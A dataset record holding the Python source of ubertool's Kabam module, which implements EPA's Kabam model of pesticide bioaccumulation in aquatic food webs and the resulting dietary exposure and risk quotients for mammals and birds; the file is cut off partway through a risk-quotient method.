repo_name
stringlengths 5
92
| path
stringlengths 4
221
| copies
stringclasses 19
values | size
stringlengths 4
6
| content
stringlengths 766
896k
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 32
997
| alpha_frac
float64 0.25
0.96
| autogenerated
bool 1
class | ratio
float64 1.5
13.6
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
puruckertom/ubertool
|
ubertool/kabam/kabam_functions.py
|
1
|
42339
|
from __future__ import division #brings in Python 3.0 mixed type calculation rules
from functools import wraps
import logging
import numpy as np
import pandas as pd
import time
from math import exp
class KabamFunctions(object):
"""
Function class for Kabam.
"""
def __init__(self):
"""Class representing the functions for Kabam"""
super(KabamFunctions, self).__init__()
def percent_to_frac(self, percent):
fraction = percent / 100.
return fraction
def ventilation_rate(self, wet_wgt):
"""
:description Ventilation rate of aquatic animal
:unit L/d
:expression Kabam Eq. A5.2b (Gv)
:param wet_wgt: wet weight of animal (kg)
:param conc_do: concentration of dissolved oxygen (mg O2/L)
:return:
"""
vent_rate = pd.Series([], dtype = 'float')
vent_rate = (1400.0 * ((wet_wgt ** 0.65) / self.conc_do))
return vent_rate
def pest_uptake_eff_bygills(self):
"""
:description Pesticide uptake efficiency by gills
:unit fraction
:expression Kabam Eq. A5.2a (Ew)
:param log kow: octanol-water partition coefficient ()
:return:
"""
pest_uptake_eff_bygills = pd.Series([], dtype = 'float')
pest_uptake_eff_bygills = (1 / (1.85 + (155. / self.kow)))
return pest_uptake_eff_bygills
def phytoplankton_k1_calc(self, k_ow):
"""
:description Uptake rate constant through respiratory area for phytoplankton
:unit L/kg*d
:expression Kabam Eq. A5.1 (K1:unique to phytoplankton)
:param 6.05e-5: Parameter 'A' in Eq. A5.1; constant related to resistance to pesticide
uptake through the aquaeous phase of plant (days)
:param 5.5: Parameter 'B' in Eq. A5.1; constant related to the resistance to pesticide
uptake through the organic phase of plant (days)
:param k_ow: octanol-water partition coefficient ()
:return:
"""
phyto_k1 = pd.Series([], dtype = 'float')
phyto_k1 = 1 / (6.0e-5 + (5.5 / k_ow))
return phyto_k1
def aq_animal_k1_calc(self, pest_uptake_eff_bygills, vent_rate, wet_wgt):
"""
:description Uptake rate constant through respiratory area for aquatic animals
:unit L/kg*d
:expression Kabam Eq. A5.2 (K1)
:param pest_uptake_eff_bygills: Pesticide uptake efficiency by gills of aquatic animals (fraction)
:param vent_rate: Ventilation rate of aquatic animal (L/d)
:param wet_wgt: wet weight of animal (kg)
:return:
"""
aqueous_animal_k1 = pd.Series([], dtype = 'float')
aqueous_animal_k1 = ((pest_uptake_eff_bygills * vent_rate) / wet_wgt)
return aqueous_animal_k1
def animal_water_part_coef(self, frac_lipid_cont, frac_nlom_cont, frac_water_cont, beta):
"""
:description Organism-Water partition coefficient (based on organism wet weight)
:unit ()
:expression Kabam Eq. A6a (Kbw)
:param frac_lipid_cont: lipid fraction of organism (kg lipid/kg organism wet weight)
:param frac_nlom_cont: non-lipid organic matter (NLOM) fraction of organism (kg NLOM/kg organism wet weight)
:param frac_water_cont water content of organism (kg water/kg organism wet weight)
:param kow: octanol-water partition coefficient ()
:param beta: proportionality constant expressing the sorption capacity of NLOM or NLOC to
that of octanol (0.35 for phytoplankton; 0.035 for all other aquatic animals)
:return:
"""
part_coef = pd.Series([], dtype = 'float')
part_coef = (frac_lipid_cont * self.kow) + (frac_nlom_cont * beta * self.kow) + frac_water_cont
return part_coef
def aq_animal_k2_calc(self, aq_animal_k1, animal_water_part_coef):
"""
:description Elimination rate constant through the respiratory area
:unit (per day)
:expression Kabam Eq. A6 (K2)
:param aq_animal_k1: Uptake rate constant through respiratory area for aquatic animals, including phytoplankton (L/kg*d)
:param animal_water_part_coef (Kbw): Organism-Water partition coefficient (based on organism wet weight ()
:return:
"""
aq_animal_k2 = pd.Series([], dtype = 'float')
aq_animal_k2 = aq_animal_k1 / animal_water_part_coef
return aq_animal_k2
def animal_grow_rate_const(self, wet_wgt):
"""
:description Aquatic animal/organism growth rate constant
:unit (per day)
:expression Kabam Eq. A7.1 & A7.2
:param wet_wgt: wet weight of animal/organism (kg)
:param water_temp: water temperature (degrees C)
:note the loop here could be moved to the main routine with the
coefficient *i.e., 0.0005, 0.00251) provided through a calling argument
:return:
"""
growth_rate = pd.Series(np.nan, index=list(range(len(self.water_temp))), dtype = 'float')
for i in range(len(self.water_temp)): #loop through model simulation runs
if self.water_temp[i] < 17.5:
growth_rate[i] = 0.0005 * (wet_wgt[i] ** -0.2)
else:
growth_rate[i] = 0.00251 * (wet_wgt[i] ** -0.2)
return growth_rate
def dietary_trans_eff(self):
"""
:description Aquatic animal/organism dietary pesticide transfer efficiency
:unit fraction
:expression Kabam Eq. A8a (Ed)
:param kow: octanol-water partition coefficient ()
:return:
"""
trans_eff = pd.Series([], dtype = 'float')
trans_eff = 1 / (.0000003 * self.kow + 2.0)
return trans_eff
def aq_animal_feeding_rate(self, wet_wgt):
"""
:description Aquatic animal feeding rate (except filterfeeders)
:unit kg/d
:expression Kabam Eq. A8b1 (Gd)
:param wet_wgt: wet weight of animal/organism (kg)
:return:
"""
feeding_rate = pd.Series([], dtype = 'float')
for i in range(len(self.water_temp)):
feeding_rate[i] = 0.022 * wet_wgt[i] ** 0.85 * exp(0.06 * self.water_temp[i])
return feeding_rate
def filterfeeders_feeding_rate(self):
"""
:description Filter feeder feeding rate
:unit kg/d
:expression Kabam Eq. A8b2 (Gd)
:param self.gv_filterfeeders: filterfeeder ventilation rate (L/d)
:param self.conc_ss: Concentration of Suspended Solids (Css - kg/L)
:param particle_scav_eff: efficiency of scavenging of particles absorbed from water (fraction)
:return:
"""
feeding_rate = pd.Series([], dtype = 'float')
feeding_rate = self.gv_filterfeeders * self.conc_ss * self.particle_scav_eff
return feeding_rate
def diet_uptake_rate_const(self, dietary_trans_eff, feeding_rate, wet_wgt):
"""
:description Pesticide uptake rate constant for uptake through ingestion of food rate
:unit kg food/kg organism - day
:expression Kabam Eq. A8 (kD)
:param wet weight of aquatic animal/organism (kg)
:param dietary_trans_eff: dietary pesticide transfer efficiency (fraction)
:param feeding rate: animal/organism feeding rate (kg/d)
:return:
"""
dietary_uptake_constantt = pd.Series([], dtype = 'float')
dietary_uptake_constant = dietary_trans_eff * feeding_rate / wet_wgt
return dietary_uptake_constant
def overall_diet_content(self, diet_fraction, content_fraction):
"""
:description Overall fraction of aquatic animal/organism diet attibuted to diet food component (i.e., lipids or NLOM or water)
:unit kg diet / kg organism
:expression not shown in Kabam documentation: it is associated with Kabam Eq. A9
overall_diet_content is equal to the sum over dietary elements
: of (fraction of diet) * (content in diet element); for example zooplankton ingest seidment and
: phytoplankton, thus the overall lipid content of the zooplankton diet equals
: (fraction of sediment in zooplankton diet) * (fraction of lipids in sediment) +
: (fraction of phytoplankton in zooplankton diet) * (fraction of lipids in phytoplankton)
:param diet_fraction: list of values representing fractions of aquatic animal/organism diet attributed
to each element (prey) of diet
:param content_fraction: list of values representing fraction of diet element (prey) attributed to a specific
component of that diet element (e.g., lipid, NLOM, or water)
:return:
"""
overall_diet_fraction = 0.0
for i in range(len(diet_fraction)):
overall_diet_fraction = overall_diet_fraction + diet_fraction[i] * content_fraction[i]
return overall_diet_fraction
def fecal_egestion_rate_factor(self, epsilonL, epsilonN, epsilonW, diet_lipid, diet_nlom, diet_water):
"""
:description Aquatic animal/organism egestion rate of fecal matter factor (to be multiplied by the
feeding rate to calculate egestion rate of fecal matter)
:unit (kg lipid)/[(kg diet)
:expression Kabam Eq. A9 (GF)
:param epsilonL: dietary assimilation rate of lipids (fraction)
:param epsilonN: dietary assimilation rate of NLOM (fraction)
:param epsilonW: dietary assimilation rate of water (fraction)
:param diet_lipid; lipid content of aquatic animal/organism diet (fraction)
:param diet_nlom NLOM content of aquatic animal/organism diet (fraction)
:param diet_water water content of aquatic animal/organism diet (fraction)
:return:
"""
rate_factor = pd.Series([], dtype = 'float')
rate_factor = (((1. - epsilonL) * diet_lipid) + ((1. - epsilonN) * diet_nlom) + (
(1. - epsilonW) * diet_water))
return rate_factor
def diet_elements_gut(self, epsilon, overall_diet_content, egestion_rate_factor):
"""
:description Fraction of diet elements (i.e., lipid, NLOM, water) in the gut
:unit (kg lipid) / (kg digested wet weight)
:expression Kabam Eq. A9 (VLG, VNG, VWG)
:param epsilon relevant dietary assimilation rate (fraction)
:param overall_diet_content relevant overall diet content of diet element, e.g., lipid/nlom/water (kg/kg)
:param egestion_rate_factor relevant: Aquatic animal/organism egestion rate of fecal matter factor
:return:
"""
gut_content = pd.Series([], dtype = 'float')
try:
gut_content = ((1. - epsilon) * overall_diet_content) / egestion_rate_factor
except:
print('Likely divide by zero in routine diet_elements_gut')
return gut_content
def gut_organism_partition_coef(self, gut_lipid, gut_nlom, gut_water, pest_kow, beta,
organism_lipid, organism_nlom, organism_water):
"""
:description Partition coefficient of the pesticide between the gastrointenstinal track and the organism
:unit none
:expression Kabam Eq. A9 (KGB)
:param gut_lipid: lipid content in the gut
:param gut_nlom: nlom content in the gut
:param gut_water: water content in the gut
:param pest_kow: pesticide Kow
:param beta: proportionality constant expressing the sorption capacity of NLOM to that of octanol
:param organism_lipid: lipid content in the whole organism
:param organism_nlom: nlom content in the whole organism
:param organism_water: water content in the whole organism
:return:
"""
part_coef = pd.Series([], dtype = 'float')
part_coef = (pest_kow * (gut_lipid + beta * gut_nlom) + gut_water) / \
(pest_kow * (organism_lipid + beta * organism_nlom) + organism_water)
return part_coef
def fecal_elim_rate_const(self, fecal_egestion_rate, diet_trans_eff, part_coef, wet_wgt):
"""
:description Rate constant for elimination of the pesticide through excretion of contaminated feces
:unit per day
:expression Kabam Eq. A9
:param fecal_egestion_rate: egestion rate of fecal matter (kg feces)/(kg organism-day)
:param diet_trans_eff: dietary pesticide transfer efficiency (fraction)
:param part_coef: gut - partition coefficient of the pesticide between the gastrointestinal tract
and the organism (-)
:param wet_wgt: wet weight of organism (kg)
:return:
"""
elim_rate_const = pd.Series([], dtype = 'float')
elim_rate_const = fecal_egestion_rate * diet_trans_eff * (part_coef / wet_wgt)
return elim_rate_const
def frac_pest_freely_diss(self):
"""
:description Calculate Fraction of pesticide freely dissolved in water column (that can be
absorbed via membrane diffusion)
:unit fraction
:expression Kabam Eq. A2
:param conc_poc: Concentration of Particulate Organic Carbon in water column (kg OC/L)
:param kow: octonal-water partition coefficient (-)
:param conc_doc: Concentration of Dissolved Organic Carbon in water column (kg OC/L)
:return:
"""
frac_diss = pd.Series([], dtype = 'float')
frac_diss = 1 / (1 + (self.conc_poc * self.alpha_poc * self.kow) + (self.conc_doc * self.alpha_doc * self.kow))
return frac_diss
def conc_freely_diss_watercol(self):
"""
:description Concentration of freely dissolved pesticide in overlying water column
:unit g/L
:expression Kabam A1 (product of terms - [phi * water_column_eec], used in Eqs F2 & F4)
:param phi: Fraction of pesticide freely dissolved in water column (that can be
absorbed via membrane diffusion) (fraction)
:param water_column_eec: Water Column 1-in-10 year EECs (ug/L)
:return:
"""
freely_dissolved_conc = pd.Series([], dtype='float')
freely_dissolved_conc = self.phi * self.water_column_eec
return freely_dissolved_conc
def conc_sed_norm_4oc(self):
"""
:description Pesticide concentration in sediment normalized for organic carbon
:unit ug/(kg OC)
:expression Kabam Eq. A4a
:param pore_water_eec: freely dissolved pesticide concentration in sediment pore water (ug/L)
:param k_oc: organic carbon partition coefficient (L/kg OC)
:Note units here are in ug/kg as opposed to g/kg as in OPP spreadsheet; this is just to be consistent with
other units used throughout
:return:
"""
conc_diss_sed = pd.Series([], dtype = 'float')
conc_diss_sed = self.k_oc * self.pore_water_eec
return conc_diss_sed
def conc_sed_dry_wgt(self):
"""
:description Calculate concentration of pesticide in solid portion of sediment
:unit ug/(kg dry sediment)
:expression Kabam Eq. A4
:param c_soc: pesticide concentration in sediment normalized for organic carbon ug/(kg OC)
:param sediment_oc: fraction organic carbon in sediment (fraction)
:Note units here are in ug/kg as opposed to g/kg as in OPP spreadsheet; this is just to be consistent with
other units used throughout
:return:
"""
conc_sed = pd.Series([], dtype = 'float')
conc_sed = self.c_soc * self.sediment_oc_frac
return conc_sed
def diet_pest_conc(self, prey_frac, prey_pest_conc, diet_lipid_frac):
"""
:description Overall concentration of pesticide in aquatic animal/organism diet and
lipid normalized overall concentration of pesticide in aquatic animal/organism diet
:unit g/(kg wet weight)
:expression Kabam Eq. A1 (SUM(Pi * CDi);
:param prey_frac: fraction of diet containing prey i (Pi in Eq. A1))
:param prey_pest_conc: concentraiton of pesticide in prey i (CDi in Eq. A1)
:param diet_lipid_frac: fraction of animal/organism that is lipid
:return:
"""
overall_diet_conc = pd.Series([], dtype = 'float')
overall_lipid_norm_conc = pd.Series([], dtype = 'float')
overall_diet_conc = len(prey_frac) * [0.0]
overall_lipid_norm_conc = len(prey_frac) * [0.0]
for j in range(len(prey_frac)): # process model simulation runs
for i in range(len(prey_frac[j])): # process individual prey items
prey_conc = prey_frac[j][i] * prey_pest_conc[j][i]
if (diet_lipid_frac[j][i] > 0.0):
lipid_norm_prey_conc = prey_conc / diet_lipid_frac[j][i]
else:
lipid_norm_prey_conc = 0.0
overall_diet_conc[j] = overall_diet_conc[j] + prey_conc
overall_lipid_norm_conc[j] = overall_lipid_norm_conc[j] + lipid_norm_prey_conc
return overall_diet_conc, overall_lipid_norm_conc
def pest_conc_organism(self, k1, k2, kD, kE, kG, kM, mP, mO, pest_diet_conc):
"""
:description Concentration of pesticide in aquatic animal/organism
:unit ug/(kg wet weight)
:expression Kabam Eq. A1 (CB)
:param k1: pesticide uptake rate constant through respiratory area (gills, skin) (L/kg-d)
:param k2: rate constant for elimination of the peisticide through the respiratory area (gills, skin) (/d)
:param kD: pesticide uptake rate constant for uptake through ingestion of food (kg food/(kg organism - day)
:param kE: rate constant for elimination of the pesticide through excretion of feces (/d)
:param kG: animal/organism growth rate constant (/d)
:param kM: rate constant for pesticide metabolic transformation (/d)
:param mP: fraction of respiratory ventilation that involves por-water of sediment (fraction)
:param mO: fraction of respiratory ventilation that involves overlying water; 1-mP (fraction)
:param phi: fraction of the overlying water pesticide concentration that is freely dissolved and can be absorbed
via membrane diffusion (fraction)
:param water_column_eec: total pesticide concentraiton in water column above sediment (ug/L)
:param pore_water_eec: freely dissovled pesticide concentration in pore-water of sediment (ug/L)
:param pest_diet_conc: concentration of pesticide in overall diet of aquatic animal/organism (ug/kg wet weight)
#because phytoplankton have no diet the (Kd * SUM(Pi * Cdi)) portion of Eq. A1 is not included here
:return:
"""
pest_conc_organism = pd.Series([], dtype = 'float')
pest_conc_organism = (k1 * ((mO * self.phi * self.water_column_eec) +
(mP * self.pore_water_eec)) + (kD * pest_diet_conc)) / (k2 + kE + kG + kM)
return pest_conc_organism
def lipid_norm_residue_conc(self, total_conc, lipid_content):
"""
:description Lipid normalized pesticide residue in aquatic animal/organism
:unit ug/kg-lipid
:expresssion represents a factor (CB/VLB) used in Kabam Eqs. F4, F5, & F6
:param total_conc: total pesticide concentration in animal/organism (ug/kg-ww)
:param lipid_content: fraction of animal/organism that is lipid (fraction)
:return:
"""
lipid_norm_conc = pd.Series([], dtype = 'float')
lipid_norm_conc = total_conc / lipid_content
return lipid_norm_conc
def pest_conc_diet_uptake(self, kD, k2, kE, kG, kM, diet_conc):
"""
:description Pesticide concentration in aquatic animal/organism originating from uptake through diet
:unit ug/kg ww
:expression Kabam A1 (with k1 = 0)
:param kD: pesticide uptake rate constant for uptake through ingestion of food (kg food/kg organizm - day)
:param diet_conc: overall concentration of pesticide in diet of animal/organism (ug/kg-ww)
:param k2: rate constant for elimination of the peisticide through the respiratory area (gills, skin) (/d)
:param kE: rate constant for elimination of the pesticide through excretion of feces (/d)
:param kG: animal/organism growth rate constant (/d)
:param kM: rate constant for pesticide metabolic transformation (/d)
:return:
"""
pest_conc_from_diet = pd.Series([], dtype = 'float')
pest_conc_from_diet = (kD * diet_conc) / (k2 + kE + kG + kM)
return pest_conc_from_diet
def pest_conc_respir_uptake(self, k1, k2, kE, kG, kM, mP, mO):
"""
:description Pesticide concentration in animal/organism originating from uptake through respiration
:unit ug/kg ww
:expression Kabam A1 (with kD = 0)
:param k1: pesticide uptake rate constant through respiratory area (gills, skin) (L/kg-d)
:param k2: rate constant for elimination of the peisticide through the respiratory area (gills, skin) (/d)
:param kE: rate constant for elimination of the pesticide through excretion of feces (/d)
:param kG: animal/organism growth rate constant (/d)
:param kM: rate constant for pesticide metabolic transformation (/d)
:param mP: fraction of respiratory ventilation that involves por-water of sediment (fraction)
:param mO: fraction of respiratory ventilation that involves overlying water; 1-mP (fraction)
:param phi: fraction of the overlying water pesticide concentration that is freely dissolved and can be absorbed
via membrane diffusion (fraction)
:param water_column_eec: total pesticide concentraiton in water column above sediment (ug/L)
:param pore_water_eec: freely dissovled pesticide concentration in pore-water of sediment (ug/L)
:return:
"""
pest_conc_from_respir = pd.Series([], dtype = 'float')
pest_conc_from_respir = (k1 * (mO * self.phi * self.water_column_eec + (mP * self.pore_water_eec))
/ (k2 + kE + kM + kG))
return pest_conc_from_respir
def tot_bioconc_fact(self, k1, k2, mP, mO):
"""
:description Total bioconcentration factor
:unit (ug pesticide/kg ww) / (ug pesticide/L water)
:expression Kabam Eq. F1
:param k1: pesticide uptake rate constant through respiratory area (gills, skin) (L/kg-d)
:param k2: rate constant for elimination of the peisticide through the respiratory area (gills, skin) (/d)
:param mP: fraction of respiratory ventilation that involves por-water of sediment (fraction)
:param mO: fraction of respiratory ventilation that involves overlying water; 1-mP (fraction)
:param phi: fraction of the overlying water pesticide concentration that is freely dissolved and can be absorbed
via membrane diffusion (fraction)
:param water_column_eec: total pesticide concentraiton in water column above sediment (ug/L)
:param pore_water_eec: freely dissovled pesticide concentration in pore-water of sediment (ug/L)
:return:
"""
bioconc_fact = pd.Series([], dtype = 'float')
bioconc_fact = (k1 * (mO * self.phi * self.water_column_eec + (mP * self.pore_water_eec)) / k2 )\
/ self.water_column_eec
return bioconc_fact
def lipid_norm_bioconc_fact(self, k1, k2, mP, mO, lipid_content):
"""
:description Lipid normalized bioconcentration factor
:unit (ug pesticide/kg lipid) / (ug pesticide/L water)
:expression Kabam Eq. F2
:param k1: pesticide uptake rate constant through respiratory area (gills, skin) (L/kg-d)
:param k2: rate constant for elimination of the peisticide through the respiratory area (gills, skin) (/d)
:param mP: fraction of respiratory ventilation that involves por-water of sediment (fraction)
:param mO: fraction of respiratory ventilation that involves overlying water; 1-mP (fraction)
:param lipid_content: fraction of animal/organism that is lipid (fraction)
:param phi: fraction of the overlying water pesticide concentration that is freely dissolved and can be absorbed
via membrane diffusion (fraction)
:param out_free_pest_conc_watercol: freely dissolved pesticide concentration in water column above sediment (ug/L)
:param pore_water_eec: freely dissovled pesticide concentration in pore-water of sediment (ug/L)
:return:
"""
lipid_norm_bcf = pd.Series([], dtype = 'float')
lipid_norm_bcf = ((k1 * (mO * self.out_free_pest_conc_watercol + mP * self.pore_water_eec) / k2 )
/ lipid_content) / self.out_free_pest_conc_watercol
return lipid_norm_bcf
def tot_bioacc_fact(self, pest_conc):
"""
:description Total bioaccumulation factor
:unit (ug pesticide/kg ww) / (ug pesticide/L water)
:expression Kabam Eq. F3
:param pest_conc: Concentration of pesticide in aquatic animal/organism (ug/(kg wet weight)
:param water_column_eec: total pesticide concentraiton in water column above sediment (ug/L)
:return:
"""
total_bioacc_fact = pd.Series([], dtype = 'float')
total_bioacc_fact = pest_conc / self.water_column_eec
return total_bioacc_fact
def lipid_norm_bioacc_fact(self, pest_conc, lipid_content):
"""
:description Lipid normalized bioaccumulation factor
:unit (ug pesticide/kg lipid) / (ug pesticide/L water)
:expression Kabam Eq. F4
:param pest_conc: Concentration of pesticide in aquatic animal/organism (ug/(kg wet weight)
:param lipid_content: fraction of animal/organism that is lipid (fraction)
:param out_free_pest_conc_watercol: freely dissolved pesticide concentration in water column above sediment (ug/L)
:return:
"""
lipid_norm_baf = pd.Series([], dtype = 'float')
lipid_norm_baf = (pest_conc/ lipid_content) / self.out_free_pest_conc_watercol
return lipid_norm_baf
def biota_sed_acc_fact(self, pest_conc, lipid_content): #cdsafl
"""
:description Biota-sediment accumulation factor
:unit (ug pesticide/kg lipid) / (ug pesticide/L water)
:expression Kabam Eq. F5
:param pest_conc: Concentration of pesticide in aquatic animal/organism (ug/(kg wet weight)
:param lipid_content: fraction of animal/organism that is lipid (fraction)
:param c_soc Pesticide concentration in sediment normalized for organic carbon content (ug/kg OC)
:return:
"""
sediment_acc_fact = pd.Series([], dtype = 'float')
#conversions not necessary, included for consistency of units use
sediment_acc_fact = (pest_conc / lipid_content) / self.c_soc
return sediment_acc_fact
def biomag_fact(self, pest_conc, lipid_content, lipid_norm_diet_conc):
"""
:description Biomagnification factor
:unit (ug pesticide/kg lipid) / (ug pesticide/kg lipid)
:expression Kabam Eq. F6
:param pest_conc: Concentration of pesticide in aquatic animal/organism (g/(kg wet weight)
:param lipid_content: fraction of animal/organism that is lipid (fraction)
:param diet_conc: Concentration of pesticide in aquatic animal/organism (g/(kg wet weight))
:return:
"""
#biomag_fact = pd.Series([], dtype = 'float')
biomag_fact = pd.Series((pest_conc / lipid_content) / lipid_norm_diet_conc, dtype = 'float')
return biomag_fact
#############################################################################
#############################################################################
#this method is not created in final Kabam model; the mweight array is created in 'set_global_constants' method
#and the conversion of concentrations (self.cb_*) is performed in the main routine
# # Mammals EECs
# def mweight_f(self):
# """
# Mammals
# :return:
# """
# self.cb_a = np.array(
# [[self.cb_phytoplankton, self.cb_zoo, self.cb_beninv, self.cb_ff, self.cb_sf, self.cb_mf, self.cb_lf]])
# self.cb_a2 = self.cb_a * 1000000
# # array of mammal weights
# #[fog/water shrew,rice rat/star-nosed mole,small mink,large mink,small river otter ,large river otter]
# self.mweight = np.array([[0.018, 0.085, 0.45, 1.8, 5, 15]])
# return self.mweight
##############################################################################
def dry_food_ingest_rate_mammals(self):
"""
:description dry food ingestion rate: Mammals (kg dry food/kg-bw day)
:unit (kg dry food / kg-bw day)
:expresssion Kabam Eq. G1
:param mammal_weights: body weight of mammal (kg)
:notes because mammal.weights are represented as constants (hardwired in the code) this
method is not designed for matrix/parallel processing; if the weights are
changed to inputs this method would be modified by removing the array structure and
inserting a simulation-based loop in the main model routine
:return:
"""
ingestion_rate = np.array([], dtype = 'float')
ingestion_rate = (0.0687 * self.mammal_weights ** 0.822) / self.mammal_weights
return ingestion_rate
def dry_food_ingest_rate_birds(self):
"""
:description dry food ingestion rate: Birds (kg dry food/kg-bw day)
:unit (kg dry food / kg-bw day)
:expresssion Kabam Eq. G2
:param bird_weights: body weight of bird (kg)
:notes because bird.weights are represented as constants (hardwired in the code) this
method is not designed for matrix/parallel processing; if the weights are
changed to inputs this method would be modified by removing the array structure and
inserting a simulation-based loop in the main model routine
:return:
"""
ingestion_rate_birds = np.array([], dtype = 'float')
ingestion_rate_birds = (0.0582 * self.bird_weights ** 0.651) / self.bird_weights
return ingestion_rate_birds
def wet_food_ingestion_rates(self, prey_water_contents, diet_fractions, dry_food_ingestion_rates):
"""
:description wet food ingestion rate for mammals and birds
:unit (kg food ww / kg-bw day)
:expresssion Kabam Eq. G3
:param prey_water_contents: fraction of prey body weights that are water
:param diet_fractions: fraction of predator (mammal or bird) diet attributed to individual prey
:param dry_food_ingestion_rates: predator (mammal or bird) dry food ingestion rate (kg food dw / kg-bw day)
:return:
"""
wet_food_ingest_rates = np.array([], dtype = 'float')
factor_1 = np.array([], dtype = 'float')
factor_2 = np.array([], dtype = 'float')
factor_3 = np.array([], dtype = 'float')
factor_4 = np.array([], dtype = 'float')
# calculate elemental factors of Kabam Eq. G3
factor_1 = diet_fractions * prey_water_contents
factor_2 = np.cumsum(factor_1, axis=1)
factor_3 = factor_2[:, 6] # selects out seventh row of array which is the cumulative sums of the products
factor_4 = 1. - factor_3
# wet food ingestion rate
wet_food_ingest_rates = dry_food_ingestion_rates / factor_4
return wet_food_ingest_rates
def drinking_water_intake_mammals(self):
"""
:description drinking water ingestion rate: Mammals
:unit (L / day)
:expresssion Kabam Eq. G4
:param mammal_weights: body weight of mammal (kg)
:return:
"""
water_ingestion_rate_mammals = np.array([], dtype = 'float')
water_ingestion_rate_mammals = (0.099 * self.mammal_weights ** 0.90)
return water_ingestion_rate_mammals
def drinking_water_intake_birds(self):
"""
:description drinking water ingestion rate: Birds
:unit (L / day)
:expresssion Kabam Eq. G5
:param bird_weights: body weight of bird (kg)
:return:
"""
water_ingestion_rate_birds = np.array([], dtype = 'float')
water_ingestion_rate_birds = (0.059 * self.bird_weights ** 0.67)
return water_ingestion_rate_birds
def dose_based_eec(self, wc_eec, pest_conc_diet, diet_fraction, wet_food_ingest_rate, water_ingest_rate, body_weight):
"""
:description dose-based EECs
:unit (mg pesticide / kg-bw day)
:expression Kabam Eq. G6
:param wc_eec: water column eec (ug/L)
:param pest_conc_diet: overall concentration of pesticide in predator (mammal or bird) diet (ug pesticide/kg-bw)
:param diet_fraction: fraction of aquatic animal/organism in diet of predator
:param wet_food_ingest_rate: overall food ingestion rate (wet based) of predator (food ww/day)
:param water_ingest_rate: drinking water ingestion rate (L/day)
:param body_weight: body weight of predator (kg)
:return:
"""
frac_diet_conc = np.array([], dtype = 'float')
sum_diet_fracs = np.array([], dtype = 'float')
overall_diet_conc = np.array([], dtype = 'float')
dose_based_eec = np.array([], dtype = 'float')
#calculate relevant factors
frac_diet_conc = pest_conc_diet * diet_fraction
sum_diet_fracs = np.cumsum(frac_diet_conc, axis=1)
overall_diet_conc = sum_diet_fracs[:, 6]
# dose based EEC (the /1000 converts ug to mg)
dose_based_eec = (overall_diet_conc / 1000.) * wet_food_ingest_rate + \
(((wc_eec / 1000.) * water_ingest_rate) / body_weight)
return dose_based_eec
def dietary_based_eec(self, pest_conc_diet, diet_fraction):
"""
:description dietary-based EECs
:unit (mg pesticide / kg-bw day)
:expression Kabam Eq. G7
:param pest_conc_diet: overall concentration of pesticide in predator (mammal or bird) diet (ug pesticide/kg-bw)
:param diet_fraction: fraction of aquatic animal/organism in diet of predator
:return:
"""
frac_diet_conc = np.array([], dtype = 'float')
sum_diet_fracs = np.array([], dtype = 'float')
overall_diet_conc = np.array([], dtype = 'float')
dietary_eec = np.array([], dtype = 'float')
#calculate relevant factors
frac_diet_conc = pest_conc_diet * diet_fraction
sum_diet_fracs = np.cumsum(frac_diet_conc, axis=1)
overall_diet_conc = sum_diet_fracs[:, 6]
# dietary-based EEC (the /1000 converts ug to mg)
dietary_eec = (overall_diet_conc / 1000)
return dietary_eec
def acute_dose_based_tox_mammals(self, ld50_mammal, tested_animal_bw):
"""
:description Dose-based acute toxicity for mammals
:unit (mg/kg-bw)
:expression Kabam Eq. G8
:param ld50_mammal: Mammalian acute oral LD50 (mg/kg-bw)
:param tested_animal_bw: body weight of tested animal (gms)
:param mammal_weights: body weight of assessed animal (kg)
:return:
"""
acute_toxicity_mammal = ld50_mammal * ((tested_animal_bw / 1000.) / self.mammal_weights) ** 0.25
return acute_toxicity_mammal
def acute_dose_based_tox_birds(self, ld50_bird, tested_bird_bw, scaling_factor):
"""
:description Dose-based acute toxicity for birds
:unit (mg/kg-bw)
:expression Kabam Eq. G9
:param ld50_bird: avian acute oral LD50 (mg/kg-bw)
:param tested_bird_bw: body weight of tested bird (gms)
:param bird_weights: body weight of assessed bird (kg)
:param scaling_factor: Chemical Specific Mineau scaling factor ()
:return:
"""
acute_toxicity_bird = pd.Series([], dtype = 'float')
acute_toxicity_bird = ld50_bird * ((self.bird_weights / (tested_bird_bw / 1000.)) ** (scaling_factor - 1.))
return acute_toxicity_bird
def chronic_dose_based_tox_mammals(self, mammalian_chronic_endpt, mammalian_chronic_endpt_unit, tested_mammal_bw):
"""
:description Dose=based chronic toxicity for mammals
:unit (mg/kg-bw)
:expression (non known documentation; see EPA OPP Kabam spreadsheet
:param mammalian_chronic_endpt:
:param mammalian_chronic_endpt_unit: ppm or mg/kg-bw
:param tested_mammal_bw: body weight of tested mammal (gms)
:param mammal_weights: body weight of assessed mammal(kg)
:return:
"""
chronic_toxicity = pd.Series([], dtype = 'float')
# the /1000 converts gms to kg; the /20 converts ppm to mg/kg-diet
if (mammalian_chronic_endpt_unit == 'ppm'):
chronic_toxicity = (mammalian_chronic_endpt / 20) * (((
(tested_mammal_bw / 1000) / self.mammal_weights)) ** 0.25)
else:
chronic_toxicity = (mammalian_chronic_endpt) * (((
(tested_mammal_bw / 1000) / self.mammal_weights)) ** 0.25)
return chronic_toxicity
def chronic_diet_based_tox_mammals(self, mammalian_chronic_endpt, mammalian_chronic_endpt_unit):
"""
:description chronic diet-based toxicity for mammals
:unit (mg/kg-diet)
:expression no known documentation; see EPA OPP Kabam spreadsheet
:param mammalian_chronic_endpt: (ppm or mg/kg-diet)
:return:
"""
chronic_toxicity = np.array([], dtype = 'float')
if (mammalian_chronic_endpt_unit == 'ppm'):
chronic_toxicity = mammalian_chronic_endpt
else:
chronic_toxicity = mammalian_chronic_endpt * 20.
return chronic_toxicity
def acute_rq_dose_mammals(self):
"""
:description Dose-based risk quotient for mammals
:unit none
:expression no known documentation; see EPA OPP Kabam spreadsheet)
:param dose_based_eec_mammals
:param acute_dose_based_tox_mammals
:return:
"""
acute_rq_dose_mamm = self.dose_based_eec_mammals / self.dose_based_tox_mammals
return acute_rq_dose_mamm
def chronic_rq_dose_mammals(self):
"""
:description Chronic dose-based risk quotient for mammals
:unit none
:expression no known documentation; see EPA OPP Kabam spreadsheet)
:param dose_based_eec_mammals: self defined
:param chronic_dose_based_tox_mammals: self defined
:return:
"""
